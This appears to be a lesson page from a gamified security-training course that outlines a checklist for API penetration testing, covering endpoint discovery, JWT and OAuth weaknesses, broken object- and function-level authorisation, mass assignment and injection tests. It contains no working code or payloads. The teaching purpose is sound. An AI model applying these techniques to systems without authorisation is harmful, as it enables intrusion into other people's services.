Professional API security testing follows a structured methodology. Improvising without a checklist leads to missed vulnerabilities and incomplete reports.
Discover all API endpoints. Look for Swagger/OpenAPI docs at /swagger.json, /api-docs, /openapi.yaml. Use Burp's crawler, JS file analysis, and Google dorking.
Test JWT weaknesses (alg:none, weak secrets), API key leakage, OAuth misconfigurations, and password reset flows.
For every endpoint, test BOLA (switch IDs), BFLA (switch roles/functions), and mass assignment (add admin:true to request bodies).
Test all input fields for SQL injection, NoSQL injection, command injection, XSS in stored fields, and XXE in XML-accepting endpoints.
✅ Always document every endpoint found, every test performed, and every finding with full request/response evidence. Reproducibility is what separates a professional pentest report from amateur notes.
Verify exercises to earn ★ 200 XP and unlock next lab level.